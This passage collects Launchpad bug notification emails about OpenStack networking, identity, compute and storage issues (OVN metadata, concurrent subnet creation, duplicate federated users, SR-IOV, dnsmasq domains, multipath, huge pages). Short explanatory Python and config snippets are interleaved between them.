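# connectivity. Names below are illustrative, not Neutron's API.
class FipNotSupportedError(Exception):
    pass


def validate_fip_association(router: dict) -> None:
    """Raise if the router's external gateway has enable_snat=False."""
    gw = router.get("external_gateway_info") or {}
    if not gw.get("enable_snat", True):
        raise FipNotSupportedError(
            "NAT is not supported on the in-path router to the "
            "external network; cannot associate a floating IP")


# A router with SNAT disabled, as in the reported topology:
snat_off = {"external_gateway_info": {"enable_snat": False}}
try:
    validate_fip_association(snat_off)
except FipNotSupportedError as e:
    print(e)
```

The point is only that the failure mode becomes an explicit API error at association time rather than broken east-west and north-south traffic discovered later.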
[Yahoo-eng-team] [Bug 1907686] Re: ovn: instance unable to retrieve metadata
2.13.3 uploaded for focal and groovy to: https://launchpad.net/~ci-train-ppa-service/+archive/ubuntu/3690 for testing. ** No longer affects: openvswitch (Ubuntu Bionic) ** Also affects: cloud-archive Importance: Undecided Status: New ** Also affects: cloud-archive/ussuri Importance: Undecided Status: New ** Also affects: cloud-archive/victoria Importance: Undecided Status: New ** Also affects: cloud-archive/wallaby Importance: Undecided Status: New ** Changed in: cloud-archive/wallaby Status: New => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/1907686 Title: ovn: instance unable to retrieve metadata Status in charm-ovn-chassis: Invalid Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive ussuri series: New Status in Ubuntu Cloud Archive victoria series: New Status in Ubuntu Cloud Archive wallaby series: Fix Released Status in neutron: Invalid Status in openvswitch package in Ubuntu: Fix Released Status in openvswitch source package in Focal: Triaged Status in openvswitch source package in Groovy: Triaged Status in openvswitch source package in Hirsute: Fix Released Bug description: Ubuntu:focal OpenStack: ussuri Instance port: hardware offloaded instance created, attempts to access metadata - metadata agent can't resolve the port/network combination: 2020-12-10 15:00:18.258 4732 INFO neutron.agent.ovn.metadata.agent [-] Port d65418a6-d0e9-47e6-84ba-3d02fe75131a in datapath 37706e4d-ce2a-4d81-8c61-3fd12437a0a7 bound to our chassis 2020-12-10 15:00:31.672 8062 ERROR neutron.agent.ovn.metadata.server [-] No port found in network 37706e4d-ce2a-4d81-8c61-3fd12437a0a7 with IP address 10.5.1.155 2020-12-10 15:00:31.673 8062 INFO eventlet.wsgi.server [-] 10.5.1.155, "GET /openstack HTTP/1.1" status: 404 len: 297 time: 0.0043790 2020-12-10 15:00:34.639 8062 ERROR neutron.agent.ovn.metadata.server [-] No port found in network
37706e4d-ce2a-4d81-8c61-3fd12437a0a7 with IP address 10.5.1.155 2020-12-10 15:00:34.639 8062 INFO eventlet.wsgi.server [-] 10.5.1.155, "GET /openstack HTTP/1.1" status: 404 len: 297 time: 0.0040138 To manage notifications about this bug go to: https://bugs.launchpad.net/charm-ovn-chassis/+bug/1907686/+subscriptions
[Yahoo-eng-team] [Bug 1890432] Re: Create subnet is failing under high load with OVN
Backports https://review.opendev.org/c/openstack/neutron/+/774256 https://review.opendev.org/c/openstack/neutron/+/774135 ** No longer affects: charm-neutron-api -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/1890432 Title: Create subnet is failing under high load with OVN Status in neutron: Fix Committed Status in neutron package in Ubuntu: Fix Released Status in neutron source package in Focal: Triaged Status in neutron source package in Groovy: Triaged Bug description: Under a high concurrency level create subnet is starting to fail (12-14% failure rate). The bundle is OVN / Ussuri. neutronclient.common.exceptions.Conflict: Unable to complete operation on subnet This subnet is being modified by another concurrent operation. Stacktrace: https://pastebin.ubuntu.com/p/sQ5CqD6NyS/ Rally task:

{% set flavor_name = flavor_name or "m1.medium" %}
{% set image_name = image_name or "bionic-kvm" %}
---
NeutronNetworks.create_and_delete_subnets:
  - args:
      network_create_args: {}
      subnet_create_args: {}
      subnet_cidr_start: "1.1.0.0/30"
      subnets_per_network: 2
    runner:
      type: "constant"
      times: 100
      concurrency: 10
    context:
      network: {}
      users:
        tenants: 30
        users_per_tenant: 1
      quotas:
        neutron:
          network: -1
          subnet: -1

Concurrency level set to 1 instead of 10 is not triggering the issue. To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1890432/+subscriptions
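The Conflict above is a retriable error, so one client-side mitigation while waiting for the server-side fix is retry with backoff. A minimal sketch of the pattern (the `Conflict` class here is a stand-in for `neutronclient.common.exceptions.Conflict`, and the flaky server is simulated):

```python
import time


class Conflict(Exception):
    """Stand-in for neutronclient.common.exceptions.Conflict."""


def create_subnet_with_retry(create, retries=5, delay=0.1):
    """Call create(), retrying on Conflict with exponential backoff."""
    for attempt in range(retries):
        try:
            return create()
        except Conflict:
            if attempt == retries - 1:
                raise
            time.sleep(delay * (2 ** attempt))


# Simulate a server that raises Conflict twice before succeeding:
calls = {"n": 0}

def flaky_create():
    calls["n"] += 1
    if calls["n"] < 3:
        raise Conflict("subnet is being modified by another operation")
    return {"subnet": {"cidr": "1.1.0.0/30"}}

print(create_subnet_with_retry(flaky_create, delay=0.001))
```

This does not remove the underlying contention, it only papers over transient losers of the race, which is why concurrency=1 in the Rally task above avoids the issue entirely.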
[Yahoo-eng-team] [Bug 1890432] Re: Create subnet is failing under high load with OVN
Hirsute/Wallaby packages include the fix from: https://review.opendev.org/c/openstack/neutron/+/745330/ So marked "Fix Released" for this target. Focal/Ussuri and Groovy/Wallaby - the fix has been merged into the neutron stable branch for each release, however there are no new point releases from Neutron for these two release targets yet. ** Changed in: neutron Status: In Progress => Fix Committed ** Changed in: neutron (Ubuntu) Status: Triaged => Invalid ** Changed in: neutron (Ubuntu) Status: Invalid => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/1890432 Title: Create subnet is failing under high load with OVN Status in neutron: Fix Committed Status in neutron package in Ubuntu: Fix Released Status in neutron source package in Focal: Triaged Status in neutron source package in Groovy: Triaged Bug description: Under a high concurrency level create subnet is starting to fail (12-14% failure rate). The bundle is OVN / Ussuri. neutronclient.common.exceptions.Conflict: Unable to complete operation on subnet This subnet is being modified by another concurrent operation. Stacktrace: https://pastebin.ubuntu.com/p/sQ5CqD6NyS/ Rally task:

{% set flavor_name = flavor_name or "m1.medium" %}
{% set image_name = image_name or "bionic-kvm" %}
---
NeutronNetworks.create_and_delete_subnets:
  - args:
      network_create_args: {}
      subnet_create_args: {}
      subnet_cidr_start: "1.1.0.0/30"
      subnets_per_network: 2
    runner:
      type: "constant"
      times: 100
      concurrency: 10
    context:
      network: {}
      users:
        tenants: 30
        users_per_tenant: 1
      quotas:
        neutron:
          network: -1
          subnet: -1

Concurrency level set to 1 instead of 10 is not triggering the issue.
To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1890432/+subscriptions
[Yahoo-eng-team] [Bug 1907686] Re: instance unable to retrieve metadata
Note that the fact the port/instance was hardware offloaded is not material here - I just tripped on the same issue with virtio ports. ** Also affects: neutron Importance: Undecided Status: New ** Summary changed: - instance unable to retrieve metadata + ovn: instance unable to retrieve metadata -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/1907686 Title: ovn: instance unable to retrieve metadata Status in charm-ovn-chassis: New Status in neutron: New Status in neutron package in Ubuntu: New Bug description: Ubuntu:focal OpenStack: ussuri Instance port: hardware offloaded instance created, attempts to access metadata - metadata agent can't resolve the port/network combination: 2020-12-10 15:00:18.258 4732 INFO neutron.agent.ovn.metadata.agent [-] Port d65418a6-d0e9-47e6-84ba-3d02fe75131a in datapath 37706e4d-ce2a-4d81-8c61-3fd12437a0a7 bound to our chassis 2020-12-10 15:00:31.672 8062 ERROR neutron.agent.ovn.metadata.server [-] No port found in network 37706e4d-ce2a-4d81-8c61-3fd12437a0a7 with IP address 10.5.1.155 2020-12-10 15:00:31.673 8062 INFO eventlet.wsgi.server [-] 10.5.1.155, "GET /openstack HTTP/1.1" status: 404 len: 297 time: 0.0043790 2020-12-10 15:00:34.639 8062 ERROR neutron.agent.ovn.metadata.server [-] No port found in network 37706e4d-ce2a-4d81-8c61-3fd12437a0a7 with IP address 10.5.1.155 2020-12-10 15:00:34.639 8062 INFO eventlet.wsgi.server [-] 10.5.1.155, "GET /openstack HTTP/1.1" status: 404 len: 297 time: 0.0040138 To manage notifications about this bug go to: https://bugs.launchpad.net/charm-ovn-chassis/+bug/1907686/+subscriptions
[Yahoo-eng-team] [Bug 1844616] Re: federated user creation creates duplicates of existing user accounts
** Project changed: charm-keystone => keystone ** Also affects: keystone (Ubuntu) Importance: Undecided Status: New -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Identity (keystone). https://bugs.launchpad.net/bugs/1844616 Title: federated user creation creates duplicates of existing user accounts Status in OpenStack Identity (keystone): New Status in keystone package in Ubuntu: New Bug description: Keystone 15.0.0-0ubuntu1~cloud0 DISTRIB_CODENAME=bionic Charm cs:keystone-306 keystone-saml-mellon-3 We had a situation where two user accounts were found with the same name and user ID in both the local_user and federated_user table. This meant that running `openstack user show --domain mydomain username2` would fail with "More than one user exists with the name 'username2'". Listing users would show only one user account, and using the user uuid to 'user show' was working fine. I ended up removing the two rows from local_user to work around this. The bug, however, is that a federated user with the same name as one already present in local_user shouldn't be created like that.
mysql> select * from local_user;
+----+----------------------------------+----------------------------------+-------------------+-------------------+----------------+
| id | user_id                          | domain_id                        | name              | failed_auth_count | failed_auth_at |
+----+----------------------------------+----------------------------------+-------------------+-------------------+----------------+
|  3 | 1e0099400dd34adeba2ed6751064227a | 87fb238ef6d0430cbda59b08e3a1ea82 | admin             |                 0 | NULL           |
|  6 | 8840d047cca346e6a00e435306f72ffc | a1effaa626284677ade0fbe3e85c59bd | cinderv2_cinderv3 |                 0 | NULL           |
|  9 | d71b70de0cdd4beba2e5f1d3842c93b1 | fa58dfa26889413e85b4855837952b74 | cinderv2_cinderv3 |                 0 | NULL           |
| 12 | d0750dcc890543918fe043eb5782e0ed | a1effaa626284677ade0fbe3e85c59bd | gnocchi           |                 0 | NULL           |
| 15 | c870e8dc427841c08fbba94b824f5765 | fa58dfa26889413e85b4855837952b74 | gnocchi           |                 0 | NULL           |
| 18 | 964d6a7b3d8d4a49ac2ef2accd5350d3 | a1effaa626284677ade0fbe3e85c59bd | neutron           |                 0 | NULL           |
| 21 | e1e77e91a9ed4dde8230d80b752d4f5c | fa58dfa26889413e85b4855837952b74 | neutron           |                 0 | NULL           |
| 24 | d090c19794dd4f27b08deab6713bd4ac | a1effaa626284677ade0fbe3e85c59bd | nova_placement    |                 0 | NULL           |
| 27 | 9fbb011ce1fc495ebf716d5cb56cd007 | fa58dfa26889413e85b4855837952b74 | nova_placement    |                 0 | NULL           |
| 30 | 1bad96de0fcd41a3b30d2c4e4ad9bb05 | a1effaa626284677ade0fbe3e85c59bd | octavia           |                 0 | NULL           |
| 33 | f4da2edc5e8f461b8d71eee67eabe4c2 | fa58dfa26889413e85b4855837952b74 | octavia           |                 0 | NULL           |
| 36 | a4d97a3a5a6644eb92848b9ea40ba71f | a1effaa626284677ade0fbe3e85c59bd | barbican          |                 0 | NULL           |
| 39 | 4d827a03abb24855b6cc37602fe346a5 | fa58dfa26889413e85b4855837952b74 | barbican          |                 0 | NULL           |
| 42 | 63b4389e35e446199b4e6a57a789e89c | a1effaa626284677ade0fbe3e85c59bd | aodh              |                 0 | NULL           |
| 45 | 3222d274dd0347a080b5371a348356b3 | fa58dfa26889413e85b4855837952b74 | aodh              |                 0 | NULL           |
| 48 | 957f4a409dec46c6b44f38a80949f7d1 | a1effaa626284677ade0fbe3e85c59bd | swift             |                 0 | NULL           |
| 51 | 8a89ed1cd1984814b544070295a2854f | fa58dfa26889413e85b4855837952b74 | swift             |                 0 | NULL           |
| 54 | 1ee61ad58f0948eab3c43fdf95790dcd | a1effaa626284677ade0fbe3e85c59bd | designate         |                 0 | NULL           |
| 57 | 32475aeb4dc0469080581f9acc9f7905 | fa58dfa26889413e85b4855837952b74 | designate         |                 0 | NULL           |
| 60 | 79b9411206524f00b0d05d3112a03840 | a1effaa626284677ade0fbe3e85c59bd | glance            |                 0 | NULL           |
| 63 | 35257eb811d84e0091381e74d4fbca21 | fa58dfa26889413e85b4855837952b74 | glance            |                 0 | NULL           |
| 66 | d07d3c3c619c4478b196bb81b8a4ced5 | a1effaa626284677ade0fbe3e85c59bd | heat_heat-cfn     |                 0 | NULL
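The ambiguity described above can be detected directly in SQL. A minimal sqlite sketch of the check (deliberately simplified schema - Keystone's real local_user/federated_user tables carry more columns and constraints):

```python
import sqlite3

# Simplified local_user / federated_user tables; find names present in
# both, i.e. the case where `openstack user show <name>` fails with
# "More than one user exists with the name ...".
conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE local_user (user_id TEXT, domain_id TEXT, name TEXT);
CREATE TABLE federated_user (user_id TEXT, display_name TEXT);
INSERT INTO local_user VALUES ('u1', 'd1', 'username2');
INSERT INTO local_user VALUES ('u2', 'd1', 'alice');
INSERT INTO federated_user VALUES ('u1', 'username2');
""")
dupes = conn.execute("""
SELECT l.name
FROM local_user l
JOIN federated_user f ON f.display_name = l.name
""").fetchall()
print(dupes)  # → [('username2',)]
```

Running the equivalent join against the real keystone database would enumerate every account affected before deciding which rows to remove.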
[Yahoo-eng-team] [Bug 1883929] Re: Upgrade from X/O -> B/Q breaks pci_devices in mysql for SR-IOV
How is the whitelist for PCI devices configured? If all of the PCI device naming changed as part of the OS upgrade (or maybe the firmware upgrade) do you also need to update the whitelist configuration for the charm? ** Also affects: charm-nova-compute Importance: Undecided Status: New -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Compute (nova). https://bugs.launchpad.net/bugs/1883929 Title: Upgrade from X/O -> B/Q breaks pci_devices in mysql for SR-IOV Status in OpenStack nova-compute charm: New Status in OpenStack Compute (nova): New Bug description: After upgrade from xenial/ocata to bionic/queens SR-IOV instance creation (--vnic-type direct) fails with missing devices: The pci_devices mysql table is filled with wrong PCI entries that do not exist on the server. Restarting nova-compute and nova-cloud-controller services did not fix (rediscover) the proper PCI devices. Related errors:
2020-06-17 12:55:19.556 1182599 WARNING nova.pci.utils [req-76b21329-b364-4999-ac86-8c729cb91ac0 - - - - -] No net device was found for VF :d8:05.0: PciDeviceNotFoundById: PCI device :d8:05.0 not found
2020-06-17 12:55:19.603 1182599 WARNING nova.pci.utils [req-76b21329-b364-4999-ac86-8c729cb91ac0 - - - - -] No net device was found for VF :d8:05.1: PciDeviceNotFoundById: PCI device :d8:05.1 not found
2020-06-17 12:55:19.711 1182599 WARNING nova.pci.utils [req-76b21329-b364-4999-ac86-8c729cb91ac0 - - - - -] No net device was found for VF :d8:04.7: PciDeviceNotFoundById: PCI device :d8:04.7 not found
Error on instance creation: {u'message': u'Device :d8:04.4 not found: could not access /sys/bus/pci/devices/:d8:04.4/config: No such file or directory', u'code': 500, u'details': u'Traceback (most recent call last):\n File "/usr/lib/python2.7/dist-packages/nova/compute/manager.py", line 1863, in _do_build_and_run_instance\n filter_properties, request_spec)\n File
"/usr/lib/python2.7/dist-packages/nova/compute/manager.py", line 2143, in _build_and_run_instance\ninstance_uuid=instance.uuid, reason=six.text_type(e))\nRescheduledException: Build of instance ec163abf-9c7a-460a-9512-4915f47af6b9 was re-scheduled: Device :d8:04.4 not found: could not access /sys/bus/pci/devices/:d8:04.4/config: No such file or directory\n', u'created': u'2020-06-17T11:46:11Z' To manage notifications about this bug go to: https://bugs.launchpad.net/charm-nova-compute/+bug/1883929/+subscriptions
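On the whitelist question: in Queens the devices tracked in pci_devices are driven by `passthrough_whitelist` in nova.conf, so if addresses or interface names changed across the upgrade the whitelist must match the new naming before nova-compute can rediscover the VFs. A sketch of the kind of entry involved (the address and physnet values below are illustrative, not taken from this deployment):

```ini
[pci]
# Match VFs by PCI address (a devname-based form also exists). If the
# device naming changed with the OS/firmware upgrade, stale entries
# here leave nova tracking devices that no longer exist.
passthrough_whitelist = {"address": "0000:d8:04.*", "physical_network": "physnet1"}
```

After correcting the whitelist, a nova-compute restart re-runs the PCI resource tracker against the devices actually present in sysfs.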
[Yahoo-eng-team] [Bug 1784342] Re: AttributeError: 'Subnet' object has no attribute '_obj_network_id'
*** This bug is a duplicate of bug 1839658 *** https://bugs.launchpad.net/bugs/1839658 Ah - this behaviour was enforced @ train, see bug 1839658 ** This bug has been marked a duplicate of bug 1839658 "subnet" register in the DB can have network_id=NULL -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/1784342 Title: AttributeError: 'Subnet' object has no attribute '_obj_network_id' Status in neutron: Confirmed Status in neutron package in Ubuntu: Confirmed Bug description: Running rally caused subnets to be created without a network_id causing this AttributeError. OpenStack Queens RDO packages

[root@controller1 ~]# rpm -qa | grep -i neutron
python-neutron-12.0.2-1.el7.noarch
openstack-neutron-12.0.2-1.el7.noarch
python2-neutron-dynamic-routing-12.0.1-1.el7.noarch
python2-neutron-lib-1.13.0-1.el7.noarch
openstack-neutron-dynamic-routing-common-12.0.1-1.el7.noarch
python2-neutronclient-6.7.0-1.el7.noarch
openstack-neutron-bgp-dragent-12.0.1-1.el7.noarch
openstack-neutron-common-12.0.2-1.el7.noarch
openstack-neutron-ml2-12.0.2-1.el7.noarch

MariaDB [neutron]> select project_id, id, name, network_id, cidr from subnets where network_id is null;
+----------------------------------+--------------------------------------+---------------------------+------------+-------------+
| project_id                       | id                                   | name                      | network_id | cidr        |
+----------------------------------+--------------------------------------+---------------------------+------------+-------------+
| b80468629bc5410ca2c53a7cfbf002b3 | 7a23c72b-3df8-4641-a494-af7642563c8e | s_rally_1e4bebf1_1s3IN6mo | NULL       | 1.9.13.0/24 |
| b80468629bc5410ca2c53a7cfbf002b3 | f7a57946-4814-477a-9649-cc475fb4e7b2 | s_rally_1e4bebf1_qWSFSMs9 | NULL       | 1.5.20.0/24 |
+----------------------------------+--------------------------------------+---------------------------+------------+-------------+

2018-07-30 10:35:13.351 42618 ERROR neutron.pecan_wsgi.hooks.translation [req-c921b9fb-499b-41c1-9103-93e71a70820c b6b96932bbef41fdbf957c2dc01776aa 050c556faa5944a8953126c867313770 - default default] GET failed.: AttributeError: 'Subnet' object has no attribute '_obj_network_id'
2018-07-30 10:35:13.351 42618 ERROR neutron.pecan_wsgi.hooks.translation Traceback (most recent call last):
2018-07-30 10:35:13.351 42618 ERROR neutron.pecan_wsgi.hooks.translation   File "/usr/lib/python2.7/site-packages/pecan/core.py", line 678, in __call__
2018-07-30 10:35:13.351 42618 ERROR neutron.pecan_wsgi.hooks.translation     self.invoke_controller(controller, args, kwargs, state)
2018-07-30 10:35:13.351 42618 ERROR neutron.pecan_wsgi.hooks.translation   File "/usr/lib/python2.7/site-packages/pecan/core.py", line 569, in invoke_controller
2018-07-30 10:35:13.351 42618 ERROR neutron.pecan_wsgi.hooks.translation     result = controller(*args, **kwargs)
2018-07-30 10:35:13.351 42618 ERROR neutron.pecan_wsgi.hooks.translation   File "/usr/lib/python2.7/site-packages/neutron/db/api.py", line 91, in wrapped
2018-07-30 10:35:13.351 42618 ERROR neutron.pecan_wsgi.hooks.translation     setattr(e, '_RETRY_EXCEEDED', True)
2018-07-30 10:35:13.351 42618 ERROR neutron.pecan_wsgi.hooks.translation   File "/usr/lib/python2.7/site-packages/oslo_utils/excutils.py", line 220, in __exit__
2018-07-30 10:35:13.351 42618 ERROR neutron.pecan_wsgi.hooks.translation     self.force_reraise()
2018-07-30 10:35:13.351 42618 ERROR neutron.pecan_wsgi.hooks.translation   File "/usr/lib/python2.7/site-packages/oslo_utils/excutils.py", line 196, in force_reraise
2018-07-30 10:35:13.351 42618 ERROR neutron.pecan_wsgi.hooks.translation     six.reraise(self.type_, self.value, self.tb)
2018-07-30 10:35:13.351 42618 ERROR neutron.pecan_wsgi.hooks.translation   File "/usr/lib/python2.7/site-packages/neutron/db/api.py", line 87, in wrapped
2018-07-30 10:35:13.351 42618 ERROR neutron.pecan_wsgi.hooks.translation     return f(*args, **kwargs)
2018-07-30 10:35:13.351 42618 ERROR neutron.pecan_wsgi.hooks.translation   File "/usr/lib/python2.7/site-packages/oslo_db/api.py", line 147, in wrapper
2018-07-30 10:35:13.351 42618 ERROR neutron.pecan_wsgi.hooks.translation     ectxt.value = e.inner_exc
2018-07-30 10:35:13.351 42618 ERROR neutron.pecan_wsgi.hooks.translation   File "/usr/lib/python2.7/site-packages/oslo_utils/excutils.py", line 220, in __exit__
2018-07-30 10:35:13.351 42618 ERROR neutron.pecan_wsgi.hooks.translation     self.force_reraise()
2018-07-30 10:35:13.351 42618 ERROR neutron.pecan_wsgi.hooks.translation   File "/usr/lib/python2.7/site-packages/oslo_utils/excutils.py", line 196, in force_reraise
2018-07-30 10:35:13.351 42618 ERROR neutron.pecan_wsgi.hooks.translation     six.reraise(self.type_, self.value, self.tb)
2018-07
[Yahoo-eng-team] [Bug 1826419] Re: dhcp agent configured with mismatching domain and host entries
** Changed in: cloud-archive/queens Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/1826419 Title: dhcp agent configured with mismatching domain and host entries Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive queens series: Fix Released Status in Ubuntu Cloud Archive rocky series: Fix Released Status in Ubuntu Cloud Archive stein series: Fix Released Status in Ubuntu Cloud Archive train series: Fix Released Status in neutron: Fix Released Status in neutron package in Ubuntu: Fix Released Status in neutron source package in Bionic: Fix Released Status in neutron source package in Cosmic: Fix Released Status in neutron source package in Disco: Fix Released Status in neutron source package in Eoan: Fix Released Bug description: Related bug 1774710 and bug 1580588 The neutron-dhcp-agent in OpenStack >= Queens makes use of the dns_domain value set on a network to configure the '--domain' parameter of the dnsmasq instance that supports it; at the same time, neutron makes use of CONF.dns_domain when creating dns_assignments for ports - this results in a hosts file for the dnsmasq instance which uses CONF.dns_domain and a --domain parameter of network.dns_domain which do not match. This results in a search path on instances booted attached to the network which is inconsistent with the internal DNS entries that dnsmasq responds with: root@bionic-045546-2:~# host 192.168.21.222 222.21.168.192.in-addr.arpa domain name pointer bionic-045546-2.jamespage.internal. root@bionic-045546-2:~# host bionic-045546-2 bionic-045546-2.designate.local has address 192.168.21.222 In the above example: CONF.dns_domain = jamespage.internal. network.dns_domain = designate.local. 
Based on previous discussion in bug 1580588 I think that the dns_domain value for a network was intended for use for external DNS integration such as that provided by Designate. The change made under commit https://opendev.org/openstack/neutron/commit/137a6d61053 appears to break this assumption, producing somewhat inconsistent behaviour in the dnsmasq instance for the network. To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/1826419/+subscriptions
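The two conflicting knobs from the example above can be summarised as a config sketch (values taken from the report; the per-network value is set separately, e.g. via `openstack network set --dns-domain designate.local. <network>`):

```ini
# neutron.conf (server side) - CONF.dns_domain is what neutron uses
# when building dns_assignment entries, and hence the dnsmasq hosts
# file written by the dhcp agent:
[DEFAULT]
dns_domain = jamespage.internal.

# Meanwhile the per-network dns_domain (designate.local. in the
# example) is what the agent passes to dnsmasq as --domain, so unless
# the two values agree, forward and reverse lookups diverge as shown
# in the host(1) output above.
```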
[Yahoo-eng-team] [Bug 1815844] Re: iscsi multipath dm-N device only used on first volume attachment
Marking charm task as invalid as this is a kernel issue with the xenial release kernel. Ubuntu/Linux bug task raised for further progression if updating to the latest HWE kernel on Xenial is not an option. ** Also affects: linux (Ubuntu) Importance: Undecided Status: New ** Changed in: charm-nova-compute Status: Triaged => Invalid -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Compute (nova). https://bugs.launchpad.net/bugs/1815844 Title: iscsi multipath dm-N device only used on first volume attachment Status in OpenStack nova-compute charm: Invalid Status in OpenStack Compute (nova): Invalid Status in os-brick: Invalid Status in linux package in Ubuntu: New Bug description: With nova-compute from cloud:xenial-queens and use-multipath=true iscsi multipath is configured and the dm-N devices used on the first attachment but subsequent attachments only use a single path. The back-end storage is a Purestorage array. 
The multipath.conf is attached. The issue is easily reproduced as shown below:

jog@pnjostkinfr01:~⟫ openstack volume create pure2 --size 10 --type pure
+---------------------+--------------------------------------+
| Field               | Value                                |
+---------------------+--------------------------------------+
| attachments         | []                                   |
| availability_zone   | nova                                 |
| bootable            | false                                |
| consistencygroup_id | None                                 |
| created_at          | 2019-02-13T23:07:40.00               |
| description         | None                                 |
| encrypted           | False                                |
| id                  | e286161b-e8e8-47b0-abe3-4df411993265 |
| migration_status    | None                                 |
| multiattach         | False                                |
| name                | pure2                                |
| properties          |                                      |
| replication_status  | None                                 |
| size                | 10                                   |
| snapshot_id         | None                                 |
| source_volid        | None                                 |
| status              | creating                             |
| type                | pure                                 |
| updated_at          | None                                 |
| user_id             | c1fa4ae9a0b446f2ba64eebf92705d53     |
+---------------------+--------------------------------------+

jog@pnjostkinfr01:~⟫ openstack volume show pure2
+--------------------------------+--------------------------------------+
| Field                          | Value                                |
+--------------------------------+--------------------------------------+
| attachments                    | []                                   |
| availability_zone              | nova                                 |
| bootable                       | false                                |
| consistencygroup_id            | None                                 |
| created_at                     | 2019-02-13T23:07:40.00               |
| description                    | None                                 |
| encrypted                      | False                                |
| id                             | e286161b-e8e8-47b0-abe3-4df411993265 |
| migration_status               | None                                 |
| multiattach                    | False                                |
| name                           | pure2                                |
| os-vol-host-attr:host          | cinder@cinder-pure#cinder-pure       |
| os-vol-mig-status-attr:migstat | None                                 |
| os-vol-mig-status-attr:name_id | None                                 |
| os-vol-tenant-attr:tenant_id   | 9be499fd1eee48dfb4dc6faf3cc0a1d7     |
| properties                     |                                      |
| replication_status             | None                                 |
| size                           | 10                                   |
| snapshot_id                    | None                                 |
| source_volid                   | None                                 |
| status                         | available                            |
| type                           | pure                                 |
| updated_at                     | 2019-02-13T23:07:41.00               |
| user_id                        | c1fa4ae9a0b446f2ba64eebf92705d53     |
+--------------------------------+--------------------------------------+

Add the volume to an instance:
jog@pnjostkinfr01:
[Yahoo-eng-team] [Bug 1734204] Re: Insufficient free host memory pages available to allocate guest RAM with Open vSwitch DPDK in Newton
Picking this back up again - I'll fold the fix for the regression introduced by this change into the same SRU so it will consist of two patches. ** Changed in: nova (Ubuntu Bionic) Status: Won't Fix => Triaged ** Changed in: cloud-archive/queens Status: Won't Fix => Triaged ** Changed in: cloud-archive/queens Assignee: (unassigned) => James Page (james-page) ** Changed in: nova (Ubuntu Bionic) Assignee: (unassigned) => James Page (james-page) -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Compute (nova). https://bugs.launchpad.net/bugs/1734204 Title: Insufficient free host memory pages available to allocate guest RAM with Open vSwitch DPDK in Newton Status in Ubuntu Cloud Archive: Invalid Status in Ubuntu Cloud Archive queens series: Triaged Status in OpenStack Compute (nova): Fix Released Status in nova package in Ubuntu: Invalid Status in nova source package in Bionic: Triaged Bug description: When spawning an instance and scheduling it onto a compute node which still has sufficient pCPUs for the instance and also sufficient free huge pages for the instance memory, nova returns: Raw [stack@undercloud-4 ~]$ nova show 1b72e7a1-c298-4c92-8d2c-0a9fe886e9bc (...) | fault| {"message": "Exceeded maximum number of retries. Exceeded max scheduling attempts 3 for instance 1b72e7a1-c298-4c92-8d2c-0a9fe886e9bc. Last exception: internal error: process exited while connecting to monitor: 2017-11-23T19:53:20.311446Z qemu-kvm: -chardev pty,id=cha", "code": 500, "details": " File \"/usr/lib/python2.7/site-packages/nova/conductor/manager.py\", line 492, in build_instances | | | filter_properties, instances[0].uuid) | | | File \"/usr/lib/python2.7/site-packages/nova/scheduler/utils.py\", line 184, in populate_retry | | | raise exception.MaxRetriesExceeded(reason=msg) | | | ", "created": "2017-11-23T19:53:22Z"} (...) 
And /var/log/nova/nova-compute.log on the compute node gives the following ERROR message: Raw
2017-11-23 19:53:21.021 153615 ERROR nova.compute.manager [req-2ad59cdf-4901-4df1-8bd7-ebaea20b9361 5d1785ee87294a6fad5e2b91cc20 8c307c08d2234b339c504bfdd896c13e - - -] [instance: 1b72e7a1-c298-4c92-8d2c-0a9fe886e9bc] Instance failed to spawn
2017-11-23 19:53:21.021 153615 ERROR nova.compute.manager [instance: 1b72e7a1-c298-4c92-8d2c-0a9fe886e9bc] Traceback (most recent call last):
2017-11-23 19:53:21.021 153615 ERROR nova.compute.manager [instance: 1b72e7a1-c298-4c92-8d2c-0a9fe886e9bc]   File "/usr/lib/python2.7/site-packages/nova/compute/manager.py", line 2087, in _build_resources
2017-11-23 19:53:21.021 153615 ERROR nova.compute.manager [instance: 1b72e7a1-c298-4c92-8d2c-0a9fe886e9bc]     yield resources
2017-11-23 19:53:21.021 153615 ERROR nova.compute.manager [instance: 1b72e7a1-c298-4c92-8d2c-0a9fe886e9bc]   File "/usr/lib/python2.7/site-packages/nova/compute/manager.py", line 1928, in _build_and_run_instance
2017-11-23 19:53:21.021 153615 ERROR nova.compute.manager [instance: 1b72e7a1-c298-4c92-8d2c-0a9fe886e9bc]     block_device_info=block_device_info)
2017-11-23 19:53:21.021 153615 ERROR nova.compute.manager [instance: 1b72e7a1-c298-4c92-8d2c-0a9fe886e9bc]   File "/usr/lib/python2.7/site-packages/nova/virt/libvirt
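A quick way to confirm whether a compute node really has enough free huge pages for the requested guest RAM is to read /proc/meminfo. A small sketch, parsing a captured sample rather than the live file (the sample values are illustrative):

```python
def free_hugepage_kb(meminfo: str) -> int:
    """Return free huge-page memory in KiB from /proc/meminfo text."""
    fields = {}
    for line in meminfo.splitlines():
        key, _, value = line.partition(":")
        if key in ("HugePages_Free", "Hugepagesize"):
            # Values look like "    1024" or "    2048 kB".
            fields[key] = int(value.split()[0])
    return fields["HugePages_Free"] * fields["Hugepagesize"]


sample = """\
HugePages_Total:    4096
HugePages_Free:     1024
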